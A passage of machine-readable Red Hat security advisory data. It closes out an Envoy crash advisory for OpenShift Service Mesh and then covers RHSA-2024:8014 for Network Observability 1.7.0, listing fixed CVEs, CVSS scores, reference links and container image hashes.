"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "envoy: Envoy crashes for `LocalReply` in HTTP async client", }, ], }
rhsa-2024:8014
Vulnerability from csaf_redhat
Published
2024-10-22 01:05
Modified
2025-04-10 05:32
Summary
Red Hat Security Advisory: Network Observability 1.7.0 for OpenShift
Notes
Topic
Network Observability 1.7 for Red Hat OpenShift
Red Hat Product Security has rated this update as having a security impact of
Important. A Common Vulnerability Scoring System (CVSS) base score, which gives
a detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Network Observability 1.7.0
Security Fix(es):
* Network Observability: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* Network Observability: XSS vulnerability via prototype pollution (CVE-2024-45801)
* Network Observability: axios: Server-Side Request Forgery (CVE-2024-39338)
* Network Observability: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* Network Observability: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* Network Observability: Backtracking regular expressions cause ReDoS (CVE-2024-45296)
* Network Observability: Improper Input Handling in Express Redirects (CVE-2024-43796)
* Network Observability: Improper Sanitization in serve-static (CVE-2024-43800)
* Network Observability: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)
* Network Observability: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)
* Network Observability: Calling Parse on a "// +build" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Network Observability 1.7 for Red Hat OpenShift\n\nRed Hat Product Security has rated this update as having a security impact of\nImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives\na detailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.", title: "Topic", }, { category: "general", text: "Network Observability 1.7.0\n\nSecurity Fix(es):\n\n* Network Observability: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* Network Observability: XSS vulnerability via prototype pollution (CVE-2024-45801)\n* Network Observability: axios: Server-Side Request Forgery (CVE-2024-39338)\n* Network Observability: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n* Network Observability: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n* Network Observability: Backtracking regular expressions cause ReDoS (CVE-2024-45296)\n* Network Observability: Improper Input Handling in Express Redirects (CVE-2024-43796)\n* Network Observability: Improper Sanitization in serve-static (CVE-2024-43800)\n* Network Observability: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)\n* Network Observability: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)\n* Network Observability: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:8014", url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2310527", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310527", }, { category: "external", summary: "2310528", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310528", }, { category: "external", summary: "2310529", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310529", }, { category: "external", summary: "2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "2312631", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312631", }, { category: "external", summary: "NETOBSERV-1377", url: "https://issues.redhat.com/browse/NETOBSERV-1377", }, { category: "external", summary: "NETOBSERV-1509", url: "https://issues.redhat.com/browse/NETOBSERV-1509", }, { category: "external", summary: "NETOBSERV-1538", url: "https://issues.redhat.com/browse/NETOBSERV-1538", }, { category: "external", summary: "NETOBSERV-1540", url: "https://issues.redhat.com/browse/NETOBSERV-1540", }, { category: "external", summary: "NETOBSERV-1564", url: "https://issues.redhat.com/browse/NETOBSERV-1564", }, { category: "external", summary: "NETOBSERV-163", url: "https://issues.redhat.com/browse/NETOBSERV-163", }, { category: "external", summary: "NETOBSERV-1666", url: "https://issues.redhat.com/browse/NETOBSERV-1666", }, { category: "external", summary: "NETOBSERV-1667", url: "https://issues.redhat.com/browse/NETOBSERV-1667", }, { category: "external", summary: "NETOBSERV-1733", url: "https://issues.redhat.com/browse/NETOBSERV-1733", }, { category: "external", summary: "NETOBSERV-1746", url: "https://issues.redhat.com/browse/NETOBSERV-1746", }, { category: "external", summary: "NETOBSERV-1748", url: "https://issues.redhat.com/browse/NETOBSERV-1748", }, { category: "external", summary: "NETOBSERV-1753", url: "https://issues.redhat.com/browse/NETOBSERV-1753", }, { category: "external", summary: "NETOBSERV-1766", url: "https://issues.redhat.com/browse/NETOBSERV-1766", }, { category: "external", summary: "NETOBSERV-1779", url: "https://issues.redhat.com/browse/NETOBSERV-1779", }, { category: "external", summary: "NETOBSERV-1783", url: "https://issues.redhat.com/browse/NETOBSERV-1783", }, { category: "external", summary: "NETOBSERV-1788", url: "https://issues.redhat.com/browse/NETOBSERV-1788", }, { category: "external", summary: "NETOBSERV-1798", url: "https://issues.redhat.com/browse/NETOBSERV-1798", }, { category: "external", summary: "NETOBSERV-1805", url: "https://issues.redhat.com/browse/NETOBSERV-1805", }, { category: "external", summary: "NETOBSERV-1806", url: "https://issues.redhat.com/browse/NETOBSERV-1806", }, { category: "external", summary: "NETOBSERV-1808", url: "https://issues.redhat.com/browse/NETOBSERV-1808", }, { category: "external", summary: "NETOBSERV-1811", url: "https://issues.redhat.com/browse/NETOBSERV-1811", }, { category: "external", summary: "NETOBSERV-1812", url: "https://issues.redhat.com/browse/NETOBSERV-1812", }, { category: "external", summary: "NETOBSERV-1813", url: "https://issues.redhat.com/browse/NETOBSERV-1813", }, { category: "external", summary: "NETOBSERV-1816", url: "https://issues.redhat.com/browse/NETOBSERV-1816", }, { category: "external", summary: "NETOBSERV-1819", url: "https://issues.redhat.com/browse/NETOBSERV-1819", }, { category: "external", summary: "NETOBSERV-1848", url: "https://issues.redhat.com/browse/NETOBSERV-1848", }, { category: "external", summary: "NETOBSERV-1884", url: "https://issues.redhat.com/browse/NETOBSERV-1884", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8014.json", }, ], title: "Red Hat Security Advisory: Network Observability 1.7.0 for OpenShift", tracking: { current_release_date: "2025-04-10T05:32:11+00:00", generator: { date: "2025-04-10T05:32:11+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:8014", initial_release_date: "2024-10-22T01:05:39+00:00", revision_history: [ { date: "2024-10-22T01:05:39+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-22T01:05:39+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-10T05:32:11+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "NETOBSERV 1.7 for RHEL 9", product: { name: "NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0", product_identification_helper: { cpe: "cpe:/a:redhat:network_observ_optr:1.7.0::el9", }, }, }, ], category: "product_family", name: "Network Observability", }, { branches: [ { category: "product_version", name: "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", product: { name: "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", product_id: "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", product_identification_helper: { purl: "pkg:oci/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee?arch=amd64&repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", product: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", product_id: "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", product_identification_helper: { purl: "pkg:oci/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f?arch=amd64&repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", product: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", product_id: "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", product_identification_helper: { purl: "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056?arch=amd64&repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", product: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", product_id: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", product_identification_helper: { purl: "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45?arch=amd64&repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", product: { name: "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", product_id: "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", product_identification_helper: { purl: "pkg:oci/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1?arch=amd64&repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle&tag=1.7.0-86", }, }, }, { category: "product_version", name: "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", product: { name: "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", product_id: "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", product_identification_helper: { purl: "pkg:oci/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba?arch=amd64&repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator&tag=v1.7.0-67", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", product: { name: "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", product_id: "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", product_identification_helper: { purl: "pkg:oci/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d?arch=ppc64le&repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", product: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", product_id: "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", product_identification_helper: { purl: "pkg:oci/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86?arch=ppc64le&repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", product: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", product_id: "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", product_identification_helper: { purl: "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe?arch=ppc64le&repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", product: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", product_id: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", product_identification_helper: { purl: "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840?arch=ppc64le&repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", product: { name: "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", product_id: "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", product_identification_helper: { purl: "pkg:oci/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b?arch=ppc64le&repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle&tag=1.7.0-86", }, }, }, { category: "product_version", name: "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", product: { name: "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", product_id: "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", product_identification_helper: { purl: "pkg:oci/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a?arch=ppc64le&repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator&tag=v1.7.0-67", }, }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", product: { name: "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", product_id: "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", product_identification_helper: { purl: "pkg:oci/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd?arch=arm64&repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", product: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", product_id: "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", product_identification_helper: { purl: "pkg:oci/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9?arch=arm64&repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", product: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", product_id: "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", product_identification_helper: { purl: "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf?arch=arm64&repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", product: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", product_id: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", product_identification_helper: { purl: "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844?arch=arm64&repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", product: { name: "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", product_id: 